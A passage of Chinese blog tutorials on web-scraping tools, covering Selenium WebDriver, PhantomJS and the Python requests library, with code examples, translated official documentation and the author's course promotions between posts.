Selenium 是什么？一句话，自动化测试工具。它支持各种浏览器，包括 Chrome，Safari，Firefox 等主流界面式浏览器，如果你在这些浏览器里面安装一个 Selenium 的插件，那么便可以方便地实现Web界面的测试。换句话说叫 Selenium 支持这些浏览器驱动。话说回来，PhantomJS不也是一个浏览器吗，那么 Selenium 支持不？答案是肯定的，这样二者便可以实现无缝对接了。然后又有什么好消息呢？Selenium支持多种语言开发，比如 Java，C，Ruby等等，有 Python 吗？那是必须的！哦这可真是天大的好消息啊。嗯，所以呢？安装一下 Python 的 Selenium 库，再安装好 PhantomJS，不就可以实现 Python＋Selenium＋PhantomJS 的无缝对接了嘛！PhantomJS 用来渲染解析JS，Selenium 用来驱动以及与 Python 的对接，Python 进行后期的处理，完美的三剑客！有人问，为什么不直接用浏览器而用一个没界面的 PhantomJS 呢？答案是：效率高！ Selenium 有两个版本，目前最新版本是 2.53.1（2016/3/22）

Selenium 2，又名 WebDriver，它的主要新功能是集成了 Selenium 1.0 以及 WebDriver（WebDriver 曾经是 Selenium 的竞争对手）。也就是说 Selenium 2 是 Selenium 和 WebDriver 两个项目的合并，即 Selenium 2 兼容 Selenium，它既支持 Selenium API 也支持 WebDriver API。

更多详情可以查看 Webdriver 的简介。 Webdriver 嗯，通过以上描述，我们应该对 Selenium 有了大概对认识，接下来就让我们开始进入动态爬取的新世界吧。本文参考内容来自 Selenium官网 SeleniumPython文档

安装

首先安装 Selenium

1	pip install selenium

或者下载源码下载源码然后解压后运行下面的命令进行安装

1	python setup.py install

安装好了之后我们便开始探索抓取方法了。

快速开始

初步体验

我们先来一个小例子感受一下 Selenium，这里我们用 Chrome 浏览器来测试，方便查看效果，到真正爬取的时候换回 PhantomJS 即可。

from selenium import webdriver

browser = webdriver.Chrome()
browser.get('http://www.baidu.com/')

运行这段代码，会自动打开浏览器，然后访问百度。如果程序执行错误，浏览器没有打开，那么应该是没有装 Chrome 浏览器或者 Chrome 驱动没有配置在环境变量里。下载驱动，然后将驱动文件路径配置在环境变量即可。浏览器驱动下载比如我的是 Mac OS，就把下载好的文件放在 /usr/bin 目录下就可以了。

模拟提交

下面的代码实现了模拟提交提交搜索的功能，首先等页面加载完成，然后输入到搜索框文本，点击提交。

from selenium import webdriver
from selenium.webdriver.common.keys import Keys

driver = webdriver.Chrome()
driver.get("http://www.python.org")
assert "Python" in driver.title
elem = driver.find_element_by_name("q")
elem.send_keys("pycon")
elem.send_keys(Keys.RETURN)
print driver.page_source

同样是在 Chrome 里面测试，感受一下。

The driver.get method will navigate to a page given by the URL. WebDriver will wait until the page has fully loaded (that is, the “onload” event has fired) before returning control to your test or script. It’s worth noting that if your page uses a lot of AJAX on load then WebDriver may not know when it has completely loaded.

其中 driver.get 方法会打开请求的URL，WebDriver 会等待页面完全加载完成之后才会返回，即程序会等待页面的所有内容加载完成，JS渲染完毕之后才继续往下执行。注意：如果这里用到了特别多的 Ajax 的话，程序可能不知道是否已经完全加载完毕。

WebDriver offers a number of ways to find elements using one of the findelement_by* methods. For example, the input text element can be located by its name attribute using find_element_by_name method

WebDriver 提供了许多寻找网页元素的方法，譬如 findelement_by* 的方法。例如一个输入框可以通过 find_element_by_name 方法寻找 name 属性来确定。

Next we are sending keys, this is similar to entering keys using your keyboard. Special keys can be send using Keys class imported from selenium.webdriver.common.keys

然后我们输入来文本然后模拟点击了回车，就像我们敲击键盘一样。我们可以利用 Keys 这个类来模拟键盘输入。最后最重要的一点 获取网页渲染后的源代码。 输出 page_source 属性即可。这样，我们就可以做到网页的动态爬取了。

测试用例

有了以上特性，我们当然可以用来写测试样例了。

import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

class PythonOrgSearch(unittest.TestCase):

    def setUp(self):
        self.driver = webdriver.Chrome()

    def test_search_in_python_org(self):
        driver = self.driver
        driver.get("http://www.python.org")
        self.assertIn("Python", driver.title)
        elem = driver.find_element_by_name("q")
        elem.send_keys("pycon")
        elem.send_keys(Keys.RETURN)
        assert "No results found." not in driver.page_source

    def tearDown(self):
        self.driver.close()

if __name__ == "__main__":
    unittest.main()

运行程序，同样的功能，我们将其封装为测试标准类的形式。

The test case class is inherited from unittest.TestCase. Inheriting from TestCase class is the way to tell unittest module that this is a test case. The setUp is part of initialization, this method will get called before every test function which you are going to write in this test case class. The test case method should always start with characters test. The tearDown method will get called after every test method. This is a place to do all cleanup actions. You can also call quit method instead of close. The quit will exit the entire browser, whereas close will close a tab, but if it is the only tab opened, by default most browser will exit entirely.

测试用例是继承了 unittest.TestCase 类，继承这个类表明这是一个测试类。setUp方法是初始化的方法，这个方法会在每个测试类中自动调用。每一个测试方法命名都有规范，必须以 test 开头，会自动执行。最后的 tearDown 方法会在每一个测试方法结束之后调用。这相当于最后的析构方法。在这个方法里写的是 close 方法，你还可以写 quit 方法。不过 close 方法相当于关闭了这个 TAB 选项卡，然而 quit 是退出了整个浏览器。当你只开启了一个 TAB 选项卡的时候，关闭的时候也会将整个浏览器关闭。

页面操作

页面交互

仅仅抓取页面没有多大卵用，我们真正要做的是做到和页面交互，比如点击，输入等等。那么前提就是要找到页面中的元素。WebDriver提供了各种方法来寻找元素。例如下面有一个表单输入框。

1	<input type="text" name="passwd" id="passwd-id" />

我们可以这样获取它

element = driver.find_element_by_id("passwd-id")
element = driver.find_element_by_name("passwd")
element = driver.find_elements_by_tag_name("input")
element = driver.find_element_by_xpath("//input[@id='passwd-id']")

你还可以通过它的文本链接来获取，但是要小心，文本必须完全匹配才可以，所以这并不是一个很好的匹配方式。而且你在用 xpath 的时候还需要注意的是，如果有多个元素匹配了 xpath，它只会返回第一个匹配的元素。如果没有找到，那么会抛出 NoSuchElementException 的异常。获取了元素之后，下一步当然就是向文本输入内容了，可以利用下面的方法

1	element.send_keys("some text")

同样你还可以利用 Keys 这个类来模拟点击某个按键。

1	element.send_keys("and some", Keys.ARROW_DOWN)

你可以对任何获取到到元素使用 send_keys 方法，就像你在 GMail 里面点击发送键一样。不过这样会导致的结果就是输入的文本不会自动清除。所以输入的文本都会在原来的基础上继续输入。你可以用下面的方法来清除输入文本的内容。

1	element.clear()

这样输入的文本会被清除。

填充表单

我们已经知道了怎样向文本框中输入文字，但是其它的表单元素呢？例如下拉选项卡的的处理可以如下

element = driver.find_element_by_xpath("//select[@name='name']")
all_options = element.find_elements_by_tag_name("option")
for option in all_options:
    print("Value is: %s" % option.get_attribute("value"))
    option.click()

首先获取了第一个 select 元素，也就是下拉选项卡。然后轮流设置了 select 选项卡中的每一个 option 选项。你可以看到，这并不是一个非常有效的方法。其实 WebDriver 中提供了一个叫 Select 的方法，可以帮助我们完成这些事情。

from selenium.webdriver.support.ui import Select
select = Select(driver.find_element_by_name('name'))
select.select_by_index(index)
select.select_by_visible_text("text")
select.select_by_value(value)

如你所见，它可以根据索引来选择，可以根据值来选择，可以根据文字来选择。是十分方便的。全部取消选择怎么办呢？很简单

1 2	select = Select(driver.find_element_by_id('id')) select.deselect_all()

这样便可以取消所有的选择。另外我们还可以通过下面的方法获取所有的已选选项。

1 2	select = Select(driver.find_element_by_xpath("xpath")) all_selected_options = select.all_selected_options

获取所有可选选项是

1	options = select.options

如果你把表单都填好了，最后肯定要提交表单对吧。怎吗提交呢？很简单

1	driver.find_element_by_id("submit").click()

这样就相当于模拟点击了 submit 按钮，做到表单提交。当然你也可以单独提交某个元素

1	element.submit()

方法，WebDriver 会在表单中寻找它所在的表单，如果发现这个元素并没有被表单所包围，那么程序会抛出 NoSuchElementException 的异常。

元素拖拽

要完成元素的拖拽，首先你需要指定被拖动的元素和拖动目标元素，然后利用 ActionChains 类来实现。

element = driver.find_element_by_name("source")
target = driver.find_element_by_name("target")

from selenium.webdriver import ActionChains
action_chains = ActionChains(driver)
action_chains.drag_and_drop(element, target).perform()

这样就实现了元素从 source 拖动到 target 的操作。

页面切换

一个浏览器肯定会有很多窗口，所以我们肯定要有方法来实现窗口的切换。切换窗口的方法如下

1	driver.switch_to_window("windowName")

另外你可以使用 window_handles 方法来获取每个窗口的操作对象。例如

1 2	for handle in driver.window_handles: driver.switch_to_window(handle)

另外切换 frame 的方法如下

1	driver.switch_to_frame("frameName.0.child")

这样焦点会切换到一个 name 为 child 的 frame 上。

弹窗处理

当你出发了某个事件之后，页面出现了弹窗提示，那么你怎样来处理这个提示或者获取提示信息呢？

1	alert = driver.switch_to_alert()

通过上述方法可以获取弹窗对象。

历史记录

那么怎样来操作页面的前进和后退功能呢？

1 2	driver.forward() driver.back()

嗯，简洁明了。

Cookies处理

为页面添加 Cookies，用法如下

# Go to the correct domain
driver.get("http://www.example.com")

# Now set the cookie. This one's valid for the entire domain
cookie = {‘name’ : ‘foo’, ‘value’ : ‘bar’}
driver.add_cookie(cookie)

获取页面 Cookies，用法如下

# Go to the correct domain
driver.get("http://www.example.com")

# And now output all the available cookies for the current URL
driver.get_cookies()

以上便是 Cookies 的处理，同样是非常简单的。

元素选取

关于元素的选取，有如下的API 单个元素选取

find_element_by_id

find_element_by_name

find_element_by_xpath

find_element_by_link_text

find_element_by_partial_link_text

find_element_by_tag_name

find_element_by_class_name

find_element_by_css_selector

多个元素选取

find_elements_by_name

find_elements_by_xpath

find_elements_by_link_text

find_elements_by_partial_link_text

find_elements_by_tag_name

find_elements_by_class_name

find_elements_by_css_selector

另外还可以利用 By 类来确定哪种选择方式

from selenium.webdriver.common.by import By

driver.find_element(By.XPATH, '//button[text()="Some text"]')
driver.find_elements(By.XPATH, '//button')

By 类的一些属性如下

ID = "id"
XPATH = "xpath"
LINK_TEXT = "link text"
PARTIAL_LINK_TEXT = "partial link text"
NAME = "name"
TAG_NAME = "tag name"
CLASS_NAME = "class name"
CSS_SELECTOR = "css selector"

更详细的元素选择方法参见官方文档元素选择

页面等待

这是非常重要的一部分，现在的网页越来越多采用了 Ajax 技术，这样程序便不能确定何时某个元素完全加载出来了。这会让元素定位困难而且会提高产生 ElementNotVisibleException 的概率。所以 Selenium 提供了两种等待方式，一种是隐式等待，一种是显式等待。隐式等待是等待特定的时间，显式等待是指定某一条件直到这个条件成立时继续执行。

显式等待

显式等待指定某个条件，然后设置最长等待时间。如果在这个时间还没有找到元素，那么便会抛出异常了。

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get("http://somedomain/url_that_delays_loading")
try:
    element = WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.ID, "myDynamicElement"))
    )
finally:
    driver.quit()

程序默认会 500ms 调用一次来查看元素是否已经生成，如果本来元素就是存在的，那么会立即返回。下面是一些内置的等待条件，你可以直接调用这些条件，而不用自己写某些等待条件了。

title_is

title_contains

presence_of_element_located

visibility_of_element_located

visibility_of

presence_of_all_elements_located

text_to_be_present_in_element

text_to_be_present_in_element_value

frame_to_be_available_and_switch_to_it

invisibility_of_element_located

element_to_be_clickable - it is Displayed and Enabled.

staleness_of

element_to_be_selected

element_located_to_be_selected

element_selection_state_to_be

element_located_selection_state_to_be

alert_is_present

from selenium.webdriver.support import expected_conditions as EC

wait = WebDriverWait(driver, 10)
element = wait.until(EC.element_to_be_clickable((By.ID,'someid')))

隐式等待

隐式等待比较简单，就是简单地设置一个等待时间，单位为秒。

from selenium import webdriver

driver = webdriver.Chrome()
driver.implicitly_wait(10) # seconds
driver.get("http://somedomain/url_that_delays_loading")
myDynamicElement = driver.find_element_by_id("myDynamicElement")

当然如果不设置，默认等待时间为0。

程序框架

对于页面测试和分析，官方提供了一个比较明晰的代码结构，可以参考。页面测试架构

API

到最后，肯定是放松最全最重要的API了，比较多，希望大家可以多加练习。 API

结语

以上就是 Selenium 的基本用法，我们讲解了页面交互，页面渲染之后的源代码的获取。这样，即使页面是 JS 渲染而成的，我们也可以手到擒来了。就是这么溜！

作者崔庆才发表于 2016-03-22 阅读次数：本文字数： 9.8k 阅读时长 ≈ 9 分钟

Python Python爬虫利器四之PhantomJS的用法

2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

前言

大家有没有发现之前我们写的爬虫都有一个共性，就是只能爬取单纯的 html 代码，如果页面是 JS 渲染的该怎么办呢？如果我们单纯去分析一个个后台的请求，手动去摸索 JS 渲染的到的一些结果，那简直没天理了。所以，我们需要有一些好用的工具来帮助我们像浏览器一样渲染 JS 处理的页面。其中有一个比较常用的工具，那就是 PhantomJS

Full web stack No browser required

PhantomJS is a headless WebKit scriptable with a JavaScript API. It has fast andnative support for various web standards: DOM handling, CSS selector, JSON, Canvas, and SVG.

PhantomJS 是一个无界面的,可脚本编程的 WebKit 浏览器引擎。它原生支持多种 web 标准：DOM 操作，CSS 选择器，JSON，Canvas 以及 SVG。好，接下来我们就一起来了解一下这个神奇好用的库的用法吧。

安装

PhantomJS 安装方法有两种，一种是下载源码之后自己来编译，另一种是直接下载编译好的二进制文件。然而自己编译需要的时间太长，而且需要挺多的磁盘空间。官方推荐直接下载二进制文件然后安装。大家可以依照自己的开发平台选择不同的包进行下载下载地址当然如果你不嫌麻烦，可以选择下载源码然后自己编译。目前（2016/3/21）最新发行版本是 v2.1，安装完成之后命令行输入

1	phantomjs -v

如果正常显示版本号，那么证明安装成功了。如果提示错误，那么请重新安装。本文介绍大部分内容来自于官方文档，博主对其进行了整理，学习更多请参考官方文档

快速开始

第一个程序

第一个程序当然是 Hello World，新建一个 js 文件。命名为 helloworld.js

1 2	console.log('Hello, world!'); phantom.exit();

命令行输入

1	phantomjs helloworld.js

程序输出了 Hello，world！程序第二句话终止了 phantom 的执行。 注意：phantom.exit();这句话非常重要，否则程序将永远不会终止。

页面加载

可以利用 phantom 来实现页面的加载，下面的例子实现了页面的加载并将页面保存为一张图片。

var page = require('webpage').create();
page.open('http://cuiqingcai.com', function (status) {
    console.log("Status: " + status);
    if (status === "success") {
        page.render('example.png');
    }
    phantom.exit();
});

首先创建了一个 webpage 对象，然后加载本站点主页，判断响应状态，如果成功，那么保存截图为 example.png 以上代码命名为 pageload.js，命令行

1	phantomjs pageload.js

发现执行成功，然后目录下多了一张图片，example.png 因为这个 render 方法，phantom 经常会用到网页截图的功能。

测试页面加载速度

下面这个例子计算了一个页面的加载速度，同时还用到了命令行传参的特性。新建文件保存为 loadspeed.js

var page = require('webpage').create(),
  system = require('system'),
  t, address;

if (system.args.length === 1) {
  console.log('Usage: loadspeed.js <some URL>');
  phantom.exit();
}

t = Date.now();
address = system.args[1];
page.open(address, function(status) {
  if (status !== 'success') {
    console.log('FAIL to load the address');
  } else {
    t = Date.now() - t;
    console.log('Loading ' + system.args[1]);
    console.log('Loading time ' + t + ' msec');
  }
  phantom.exit();
});

程序判断了参数的多少，如果参数不够，那么终止运行。然后记录了打开页面的时间，请求页面之后，再纪录当前时间，二者之差就是页面加载速度。

1	phantomjs loadspeed.js http://cuiqingcai.com

运行结果

1 2	Loading http://cuiqingcai.com Loading time 11678 msec

这个时间包括 JS 渲染的时间，当然和网速也有关。

代码评估

To evaluate JavaScript code in the context of the web page, use evaluate() function. The execution is “sandboxed”, there is no way for the code to access any JavaScript objects and variables outside its own page context. An object can be returned from evaluate(), however it is limited to simple objects and can’t contain functions or closures.

利用 evaluate 方法我们可以获取网页的源代码。这个执行是“沙盒式”的，它不会去执行网页外的 JavaScript 代码。evalute 方法可以返回一个对象，然而返回值仅限于对象，不能包含函数（或闭包）

var url = 'http://www.baidu.com';
var page = require('webpage').create();
page.open(url, function(status) {
  var title = page.evaluate(function() {
    return document.title;
  });
  console.log('Page title is ' + title);
  phantom.exit();
});

以上代码获取了百度的网站标题。

1	Page title is 百度一下，你就知道

任何来自于网页并且包括来自 evaluate() 内部代码的控制台信息，默认不会显示。需要重写这个行为，使用 onConsoleMessage 回调函数，示例可以改写成

var url = 'http://www.baidu.com';
var page = require('webpage').create();
page.onConsoleMessage = function (msg) {
    console.log(msg);
};
page.open(url, function (status) {
    page.evaluate(function () {
        console.log(document.title);
    });
    phantom.exit();
});

这样的话，如果你用浏览器打开百度首页，打开调试工具的 console，可以看到控制台输出信息。重写了 onConsoleMessage 方法之后，可以发现控制台输出的结果和我们需要输出的标题都打印出来了。

一张网页，要经历怎样的过程，才能抵达用户面前？
一位新人，要经历怎样的成长，才能站在技术之巅？
探寻这里的秘密；
体验这里的挑战；
成为这里的主人；
加入百度，加入网页搜索，你，可以影响世界。

请将简历发送至 %c ps_recruiter@baidu.com（ 邮件标题请以“姓名-应聘XX职位-来自console”命名） color:red
职位介绍：http://dwz.cn/hr2013
百度一下，你就知道

啊，我没有在为百度打广告！

屏幕捕获

Since PhantomJS is using WebKit, a real layout and rendering engine, it can capture a web page as a screenshot. Because PhantomJS can render anything on the web page, it can be used to convert contents not only in HTML and CSS, but also SVG and Canvas.

因为 PhantomJS 使用了 WebKit 内核，是一个真正的布局和渲染引擎，它可以像屏幕截图一样捕获一个 web 界面。因为它可以渲染网页中的人和元素，所以它不仅用到 HTML，CSS 的内容转化，还用在 SVG，Canvas。可见其功能是相当强大的。下面的例子就捕获了 github 网页的截图。上文有类似内容，不再演示。

var page = require('webpage').create();
page.open('http://github.com/', function() {
  page.render('github.png');
  phantom.exit();
});

除了 png 格式的转换，PhantomJS 还支持 jpg，gif，pdf 等格式。测试样例其中最重要的方法便是 viewportSize 和 clipRect 属性。 viewportSize 是视区的大小，你可以理解为你打开了一个浏览器，然后把浏览器窗口拖到了多大。 clipRect 是裁切矩形的大小，需要四个参数，前两个是基准点，后两个参数是宽高。通过下面的小例子感受一下。

var page = require('webpage').create();
//viewportSize being the actual size of the headless browser
page.viewportSize = { width: 1024, height: 768 };
//the clipRect is the portion of the page you are taking a screenshot of
page.clipRect = { top: 0, left: 0, width: 1024, height: 768 };
//the rest of the code is the same as the previous example
page.open('http://cuiqingcai.com/', function() {
  page.render('germy.png');
  phantom.exit();
});

运行结果就相当于把浏览器窗口拖到了 1024x768 大小，然后从左上角裁切出了 1024x768 的页面。

网络监听

Because PhantomJS permits the inspection of network traffic, it is suitable to build various analysis on the network behavior and performance.

因为 PhantomJS 有网络通信的检查功能，它也很适合用来做网络行为的分析。

When a page requests a resource from a remote server, both the request and the response can be tracked via onResourceRequested and onResourceReceived callback.

当接受到请求时，可以通过改写 onResourceRequested 和 onResourceReceived 回调函数来实现接收到资源请求和资源接受完毕的监听。例如

var url = 'http://www.cuiqingcai.com';
var page = require('webpage').create();
page.onResourceRequested = function(request) {
  console.log('Request ' + JSON.stringify(request, undefined, 4));
};
page.onResourceReceived = function(response) {
  console.log('Receive ' + JSON.stringify(response, undefined, 4));
};
page.open(url);

运行结果会打印出所有资源的请求和接收状态，以 JSON 格式输出。

页面自动化处理

Because PhantomJS can load and manipulate a web page, it is perfect to carry out various page automations.

因为 PhantomJS 可以加载和操作一个 web 页面，所以用来自动化处理也是非常适合的。

DOM 操作

Since the script is executed as if it is running on a web browser, standard DOM scripting and CSS selectors work just fine.

脚本都是像在浏览器中运行的，所以标准的 JavaScript 的 DOM 操作和 CSS 选择器也是生效的。例如下面的例子就修改了 User-Agent，然后还返回了页面中某元素的内容。

var page = require('webpage').create();
console.log('The default user agent is ' + page.settings.userAgent);
page.settings.userAgent = 'SpecialAgent';
page.open('http://www.httpuseragent.org', function(status) {
  if (status !== 'success') {
    console.log('Unable to access network');
  } else {
    var ua = page.evaluate(function() {
      return document.getElementById('myagent').textContent;
    });
    console.log(ua);
  }
  phantom.exit();
});

运行结果

1 2	The default user agent is Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.0 Safari/538.1 Your Http User Agent string is: SpecialAgent

首先打印出了默认的 User-Agent，然后通过修改它，请求验证 User-Agent 的一个站点，通过选择器得到了修改后的 User-Agent。

使用附加库

在 1.6 版本之后允许添加外部的 JS 库，比如下面的例子添加了 jQuery，然后执行了 jQuery 代码。

var page = require('webpage').create();
page.open('http://www.sample.com', function() {
  page.includeJs("http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js", function() {
    page.evaluate(function() {
      $("button").click();
    });
    phantom.exit()
  });
});

引用了 jQuery 之后，我们便可以在下面写一些 jQuery 代码了。

Webpage 对象

在前面我们介绍了 webpage 对象的几个方法和属性，其实它本身还有其它很多的属性。具体的内容可以参考 Webpage Webpage 用例里面介绍了 webpage 的所有属性，方法，回调。

命令行

Command-line Options PhantomJS 提供的命令行选项有：

--help or -h lists all possible command-line options. Halts immediately, will not run a script passed as argument. ［帮助列表］ —version or -v prints out the version of PhantomJS. Halts immediately, will not run a script passed as argument. ［查看版本］ —cookies-file=/path/to/cookies.txt specifies the file name to store the persistent Cookies. ［指定存放 cookies 的路径］ —disk-cache=[true|false] enables disk cache (at desktop services cache storage location, default is false). Also accepted: [yes|no]. ［硬盘缓存开关，默认为关］ —ignore-ssl-errors=[true|false] ignores SSL errors, such as expired or self-signed certificate errors (default is false). Also accepted: [yes|no]. ［忽略 ssl 错误，默认不忽略］ —load-images=[true|false] load all inlined images (default is true). Also accepted: [yes|no]. ［加载图片，默认为加载］ —local-storage-path=/some/path path to save LocalStorage content and WebSQL content. ［本地存储路径，如本地文件和 SQL 文件等］ —local-storage-quota=number maximum size to allow for data. ［本地文件最大大小］ —local-to-remote-url-access=[true|false] allows local content to access remote URL (default is false). Also accepted: [yes|no]. ［是否允许远程加载文件，默认不允许］ —max-disk-cache-size=size limits the size of disk cache (in KB). ［最大缓存空间］ —output-encoding=encoding sets the encoding used for terminal output (default is utf8). ［默认输出编码，默认 utf8］ —remote-debugger-port starts the script in a debug harness and listens on the specified port ［远程调试端口］ —remote-debugger-autorun runs the script in the debugger immediately: ‘yes’ or ‘no’ (default) ［在调试环境下是否立即执行脚本，默认否］ —proxy=address:port specifies the proxy server to use (e.g. —proxy=192.168.1.42:8080). ［代理］ —proxy-type=[http|socks5|none] specifies the type of the proxy server (default is http). ［代理类型，默认 http］ —proxy-auth specifies the authentication information for the proxy, e.g. —proxy-auth=username:password). ［代理认证］ —script-encoding=encoding sets the encoding used for the starting script (default is utf8). ［脚本编码，默认 utf8］ —ssl-protocol=[sslv3|sslv2|tlsv1|any’] sets the SSL protocol for secure connections (default is SSLv3). ［SSL 协议，默认 SSLv3］ —ssl-certificates-path= Sets the location for custom CA certificates (if none set, uses system default). ［SSL 证书路径，默认系统默认路径］ —web-security=[true|false] enables web security and forbids cross-domain XHR (default is true). Also accepted: [yes|no]. ［是否开启安全保护和禁止异站 Ajax，默认开启保护］ —webdriver starts in ‘Remote WebDriver mode’ (embedded GhostDriver): ‘[[:]]’ (default ‘127.0.0.1:8910’) ［以远程 WebDriver 模式启动］ —webdriver-selenium-grid-hub URL to the Selenium Grid HUB: ‘URLTOHUB’ (default ‘none’) (NOTE: works only together with ‘—webdriver’) ［Selenium 接口］ —config=/path/to/config.json can utilize a JavaScript Object Notation (JSON) configuration file instead of passing in multiple command-line optionss ［所有的命令行配置从 config.json 中读取］

注：JSON 文件配置格式

{
  /* Same as: --ignore-ssl-errors=true */
  "ignoreSslErrors": true,

  /* Same as: --max-disk-cache-size=1000 */
  "maxDiskCacheSize": 1000,

  /* Same as: --output-encoding=utf8 */
  "outputEncoding": "utf8"

  /* etc. */
}

There are some keys that do not translate directly:

 * --disk-cache => diskCacheEnabled
 * --load-images => autoLoadImages
 * --local-storage-path => offlineStoragePath
 * --local-storage-quota => offlineStorageDefaultQuota
 * --local-to-remote-url-access => localToRemoteUrlAccessEnabled
 * --web-security => webSecurityEnabled

以上是命令行的基本配置

实例

在此提供官方文档实例，多对照实例练习，使用起来会更得心应手。官方实例

结语

以上是博主对 PhantomJS 官方文档的基本总结和翻译，如有差错，希望大家可以指正。另外可能有的小伙伴觉得这个工具和 Python 有什么关系？不要急，后面会有 Python 和 PhantomJS 的综合使用的。

作者崔庆才发表于 2016-03-22 阅读次数：本文字数： 10k 阅读时长 ≈ 9 分钟

Python Python爬虫利器一之Requests库的用法

2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

前言

之前我们用了 urllib 库，这个作为入门的工具还是不错的，对了解一些爬虫的基本理念，掌握爬虫爬取的流程有所帮助。入门之后，我们就需要学习一些更加高级的内容和工具来方便我们的爬取。那么这一节来简单介绍一下 requests 库的基本用法。 注：Python 版本依然基于 2.7

官方文档

以下内容大多来自于官方文档，本文进行了一些修改和总结。要了解更多可以参考官方文档

安装

利用 pip 安装

1	$ pip install requests

或者利用 easy_install

1	$ easy_install requests

通过以上两种方法均可以完成安装。

引入

首先我们引入一个小例子来感受一下

import requests

r = requests.get('http://cuiqingcai.com')
print type(r)
print r.status_code
print r.encoding
#print r.text
print r.cookies

以上代码我们请求了本站点的网址，然后打印出了返回结果的类型，状态码，编码方式，Cookies等内容。运行结果如下

<class 'requests.models.Response'>
200
UTF-8
<RequestsCookieJar[]>

怎样，是不是很方便。别急，更方便的在后面呢。

基本请求

requests库提供了http所有的基本请求方式。例如

r = requests.post("http://httpbin.org/post")
r = requests.put("http://httpbin.org/put")
r = requests.delete("http://httpbin.org/delete")
r = requests.head("http://httpbin.org/get")
r = requests.options("http://httpbin.org/get")

嗯，一句话搞定。

基本GET请求

最基本的GET请求可以直接用get方法

1	r = requests.get("http://httpbin.org/get")

如果想要加参数，可以利用 params 参数

import requests

payload = {'key1': 'value1', 'key2': 'value2'}
r = requests.get("http://httpbin.org/get", params=payload)
print r.url

运行结果

1	http://httpbin.org/get?key2=value2&key1=value1

如果想请求JSON文件，可以利用 json() 方法解析例如自己写一个JSON文件命名为a.json，内容如下

1
2
3

["foo", "bar", {
  "foo": "bar"
}]

利用如下程序请求并解析

import requests

r = requests.get("a.json")
print r.text
print r.json()

运行结果如下，其中一个是直接输出内容，另外一个方法是利用 json() 方法解析，感受下它们的不同

["foo", "bar", {
 "foo": "bar"
 }]
 [u'foo', u'bar', {u'foo': u'bar'}]

如果想获取来自服务器的原始套接字响应，可以取得 r.raw 。不过需要在初始请求中设置 stream=True 。

r = requests.get('https://github.com/timeline.json', stream=True)
r.raw
<requests.packages.urllib3.response.HTTPResponse object at 0x101194810>
r.raw.read(10)
'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03'

这样就获取了网页原始套接字内容。如果想添加 headers，可以传 headers 参数

import requests

payload = {'key1': 'value1', 'key2': 'value2'}
headers = {'content-type': 'application/json'}
r = requests.get("http://httpbin.org/get", params=payload, headers=headers)
print r.url

通过headers参数可以增加请求头中的headers信息

基本POST请求

对于 POST 请求来说，我们一般需要为它增加一些参数。那么最基本的传参方法可以利用 data 这个参数。

import requests

payload = {'key1': 'value1', 'key2': 'value2'}
r = requests.post("http://httpbin.org/post", data=payload)
print r.text

运行结果

{
  "args": {}, 
  "data": "", 
  "files": {}, 
  "form": {
    "key1": "value1", 
    "key2": "value2"
  }, 
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Content-Length": "23", 
    "Content-Type": "application/x-www-form-urlencoded", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1"
  }, 
  "json": null, 
  "url": "http://httpbin.org/post"
}

可以看到参数传成功了，然后服务器返回了我们传的数据。有时候我们需要传送的信息不是表单形式的，需要我们传JSON格式的数据过去，所以我们可以用 json.dumps() 方法把表单数据序列化。

import json
import requests

url = 'http://httpbin.org/post'
payload = {'some': 'data'}
r = requests.post(url, data=json.dumps(payload))
print r.text

运行结果

{
  "args": {}, 
  "data": "{\"some\": \"data\"}", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Content-Length": "16", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1"
  }, 
  "json": {
    "some": "data"
  },  
  "url": "http://httpbin.org/post"
}

通过上述方法，我们可以POST JSON格式的数据如果想要上传文件，那么直接用 file 参数即可新建一个 a.txt 的文件，内容写上 Hello World!

import requests

url = 'http://httpbin.org/post'
files = {'file': open('test.txt', 'rb')}
r = requests.post(url, files=files)
print r.text

可以看到运行结果如下

{
  "args": {}, 
  "data": "", 
  "files": {
    "file": "Hello World!"
  }, 
  "form": {}, 
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Content-Length": "156", 
    "Content-Type": "multipart/form-data; boundary=7d8eb5ff99a04c11bb3e862ce78d7000", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1"
  }, 
  "json": null, 
  "url": "http://httpbin.org/post"
}

这样我们便成功完成了一个文件的上传。 requests 是支持流式上传的，这允许你发送大的数据流或文件而无需先把它们读入内存。要使用流式上传，仅需为你的请求体提供一个类文件对象即可

1 2	with open('massive-body') as f: requests.post('http://some.url/streamed', data=f)

这是一个非常实用方便的功能。

Cookies

如果一个响应中包含了cookie，那么我们可以利用 cookies 变量来拿到

import requests

url = 'http://example.com'
r = requests.get(url)
print r.cookies
print r.cookies['example_cookie_name']

以上程序仅是样例，可以用 cookies 变量来得到站点的 cookies 另外可以利用 cookies 变量来向服务器发送 cookies 信息

import requests

url = 'http://httpbin.org/cookies'
